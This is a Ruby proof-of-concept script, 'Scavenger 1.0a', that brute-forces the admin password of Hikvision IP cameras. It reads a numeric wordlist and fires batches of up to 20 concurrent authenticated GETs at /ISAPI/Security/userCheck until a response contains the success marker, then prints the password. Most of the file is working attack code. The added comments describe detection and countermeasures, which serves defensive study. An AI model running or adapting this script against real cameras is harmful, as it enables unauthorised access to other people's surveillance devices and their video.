#!/usr/bin/ruby
###################################################################################################
#Author : Shankar Damodaran
#Codename : Scavenger 1.0a
#Description : A brute force script that attempts to break in Hikvision IP Camera Routers
#Filename : skavngr.rb
#Disclaimer : This proof-of-concept is not intended to be used for malicious purposes. The author is not responsible for any loss or damage caused.
###################################################################################################
require 'typhoeus'
require 'colorize'
######### Configuration Begins ########
# Address of the device under test. The value below is a placeholder.
target = 'targetipaddressoftherouter'
# Wordlist path, read one candidate per line.
# The sample list holds 6-digit values ranging from 000000 to 999999.
file_path = 'passwd.lst'
######## Configuration Ends ##########
# Accumulator that read_array appends the cleaned candidates to.
passwords = []
puts "Initializing the password list. Please wait..."
# Loads the wordlist at +file_path+ and appends every entry to +passwords+.
#
# Each line is re-encoded byte by byte (every byte becomes one UTF-8
# code point) and has its surrounding whitespace, including the line
# terminator, stripped before it is stored.
#
# @param file_path [String] path of the wordlist, one candidate per line
# @param passwords [Array<String>] array that is mutated in place
# @return [Array] one reference to +passwords+ per line read (callers in this file ignore it)
def read_array(file_path,passwords)
  File.readlines(file_path).map { |raw| passwords.push(raw.bytes.pack("U*").strip) }
end
# Fill `passwords` from the wordlist configured above.
read_array(file_path, passwords)
time = Time.now
totpasswords = passwords.size
puts "\n#{totpasswords} passwords loaded. \nBruteforce Sequence Initialization Started at #{time.inspect}"
# Cut the list into chunks of half its length (integer division); every
# chunk is later handed to multi_channel_split as one batch of requests.
half = (totpasswords/2).round
new_pass = passwords.each_slice(half).to_a
# Sends one batch of authentication attempts through a Typhoeus Hydra and
# checks the replies for a success marker.
#
# For each of the first +req+ entries of +passwords+ it builds a GET request to
# http://<target>/ISAPI/Security/userCheck with the credentials
# "admin:<entry>", queues all of them, runs the queue, and then scans every
# response body for '<statusString>OK</statusString>'. On the first match it
# prints the matching entry and terminates the process with +abort+.
#
# What this looks like from the device or network side (derived from the
# request built below): bursts of up to 20 concurrent GETs to
# /ISAPI/Security/userCheck over plain HTTP, always for the user "admin", each
# carrying a different password. A high rate of failed logins for one account
# from one source is the signal to alert on. Lockout after repeated failures
# (where the firmware offers it), passwords outside a small numeric space such
# as the 6-digit sample list, and keeping the management interface off
# untrusted networks are the controls that defeat this kind of guessing.
#
# @param target [String] host part interpolated into the request URL
# @param req [Integer] number of requests to build; the caller passes the chunk length
# @param passwords [Array<String>] candidates, read by index 0...req
# @return [Array<Integer>] the counter values produced by the response scan; the caller does not use it
def multi_channel_split(target,req,passwords)
# i indexes the candidate used when building a request; j tracks the
# position of the response being inspected so the match can be reported.
i=0
j=0
# The default concurrency is 200; it is set to 20 here, so at most 20 requests are in flight at once.
hydra = Typhoeus::Hydra.new(max_concurrency: 20)
# Verbose output and memoisation are switched off. Memoisation must be off so that
# requests that differ only in credentials are all actually sent.
# This is library-wide configuration and is re-applied on every call.
Typhoeus.configure do |config|
config.verbose = false
config.memoize = false
end
requests = req.times.map {
# userpwd supplies the HTTP authentication credentials for this request.
request = Typhoeus::Request.new("http://#{target}/ISAPI/Security/userCheck",
method: :get,
userpwd: "admin:#{passwords[i]}")
i+=1
# The request is only queued here; nothing is sent until hydra.run below.
hydra.queue(request)
request
}
# Runs every queued request of this batch and blocks until all have completed.
hydra.run
# `responses` is assigned but never read afterwards.
responses = requests.map { |request|
# A body containing this marker is treated as a successful authentication.
if request.response.body.index('<statusString>OK</statusString>') != nil
time = Time.new
puts "\nPassword Found at #{time.inspect}!: #{passwords[j]} \n".green
# Terminates the whole script, so later batches are never sent.
abort
end
j+=1
}
# End of the parallelization module
end
# Hand each chunk to multi_channel_split in turn; the request count for a
# batch is simply the chunk's own length.
new_pass.each { |chunk| multi_channel_split(target, chunk.length, chunk) }
# Reached only when no batch ended the process with a match.
puts "\nPassword was not found in this list. Subject another file to start a new operation.".red
# End of Proof of Concept
####################################################################################################